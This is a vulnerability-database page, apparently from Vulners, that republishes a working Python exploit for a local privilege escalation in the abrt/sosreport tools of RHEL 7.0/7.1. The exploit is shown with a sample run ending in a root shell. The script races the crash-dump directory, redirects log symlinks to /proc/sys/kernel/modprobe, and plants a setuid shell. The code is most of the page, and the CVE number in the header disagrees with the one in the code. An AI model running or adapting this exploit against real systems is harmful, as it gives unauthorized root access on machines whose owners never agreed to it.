RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation

🗓️ 01 Dec 2015 00:00:00Reported by rebelType

RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation CVE-2015-528

Reporter	Title	Published	Views	Family All 38
0day.today	Centos 7.1 / Fedora 22 - abrt Local Root Exploit	1 Dec 201500:00	–	zdt
0day.today	RHEL 7.0/7.1 - abrt/sosreport Local Root Exploit	1 Dec 201500:00	–	zdt
0day.today	ABRT - sosreport Privilege Escalation Exploit	26 Sep 201900:00	–	zdt
Tenable Nessus	CentOS 7 : abrt / libreport (CESA-2015:2505)	2 Dec 201500:00	–	nessus
Tenable Nessus	Fedora 23 : abrt-2.7.1-1.fc23 (2015-79c1758468)	4 Mar 201600:00	–	nessus
Tenable Nessus	MiracleLinux 7 : [security - medium] abrt and libreport (AXSA:2015-920:01)	16 Jan 202600:00	–	nessus
Tenable Nessus	Oracle Linux 7 : abrt / and / libreport (ELSA-2015-2505)	30 Nov 201500:00	–	nessus
Tenable Nessus	RHEL 7 : abrt and libreport (RHSA-2015:2505)	24 Nov 201500:00	–	nessus
Tenable Nessus	Scientific Linux Security Update : abrt and libreport on SL7.x x86_64 (20151123)	22 Dec 201500:00	–	nessus
Cent OS	abrt, libreport security update	1 Dec 201518:46	–	centos

#!/usr/bin/python
# CVE-2015-5287 (?)
# abrt/sosreport RHEL 7.0/7.1 local root
# rebel 09/2015

# [user@localhost ~]$ python sosreport-rhel7.py
# crashing pid 19143
# waiting for dump directory
# dump directory:  /var/tmp/abrt/ccpp-2015-11-30-19:41:13-19143
# waiting for sosreport directory
# sosreport:  sosreport-localhost.localdomain-20151130194114
# waiting for tmpfiles
# tmpfiles:  ['tmpurfpyY', 'tmpYnCfnQ']
# moving directory
# moving tmpfiles
# tmpurfpyY -> tmpurfpyY.old
# tmpYnCfnQ -> tmpYnCfnQ.old
# waiting for sosreport to finish (can take several minutes)........................................done
# success
# bash-4.2# id
# uid=0(root) gid=1000(user) groups=0(root),1000(user) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
# bash-4.2# cat /etc/redhat-release 
# Red Hat Enterprise Linux Server release 7.1 (Maipo)

import os,sys,glob,time,sys,socket

payload = "#!/bin/sh\ncp /bin/sh /tmp/sh\nchmod 6755 /tmp/sh\n"

pid = os.fork()

if pid == 0:
	os.execl("/usr/bin/sleep","sleep","100")

time.sleep(0.5)

print "crashing pid %d" % pid

os.kill(pid,11)

print "waiting for dump directory"

def waitpath(p):
	while 1:
		r = glob.glob(p)
		if len(r) > 0:
			return r
		time.sleep(0.05)	

dumpdir = waitpath("/var/tmp/abrt/cc*%d" % pid)[0]

print "dump directory: ", dumpdir

os.chdir(dumpdir)

print "waiting for sosreport directory"

sosreport = waitpath("sosreport-*")[0]

print "sosreport: ", sosreport

print "waiting for tmpfiles"
tmpfiles = waitpath("tmp*")

print "tmpfiles: ", tmpfiles

print "moving directory"

os.rename(sosreport, sosreport + ".old")
os.mkdir(sosreport)
os.chmod(sosreport,0777)

os.mkdir(sosreport + "/sos_logs")
os.chmod(sosreport + "/sos_logs",0777)

os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/sos.log")
os.symlink("/proc/sys/kernel/modprobe",sosreport + "/sos_logs/ui.log")

print "moving tmpfiles"

for x in tmpfiles:
	print "%s -> %s" % (x,x + ".old")
	os.rename(x, x + ".old")
	open(x, "w+").write("/tmp/hax.sh\n")
	os.chmod(x,0666)


os.chdir("/")

sys.stderr.write("waiting for sosreport to finish (can take several minutes)..")


def trigger():
	open("/tmp/hax.sh","w+").write(payload)
	os.chmod("/tmp/hax.sh",0755)
	try: socket.socket(socket.AF_INET,socket.SOCK_STREAM,132)
	except: pass
	time.sleep(0.5)
	try:
		os.stat("/tmp/sh")
	except:
		print "could not create suid"
		sys.exit(-1)
	print "success"
	os.execl("/tmp/sh","sh","-p","-c",'''echo /sbin/modprobe > /proc/sys/kernel/modprobe;rm -f /tmp/sh;python -c "import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');"''')
	sys.exit(-1)

for x in xrange(0,60*10):
	if "/tmp/hax" in open("/proc/sys/kernel/modprobe").read():
		print "done"
		trigger()
	time.sleep(1)
	sys.stderr.write(".")

print "timed out"

01 Dec 2015 00:00Current

6.4Medium risk

Vulners AI Score6.4

CVSS 26.9

EPSS0.03314

RHEL 7.0/7.1 - &#039;abrt/sosreport&#039; Local Privilege Escalation

RHEL 7.0/7.1 - 'abrt/sosreport' Local Privilege Escalation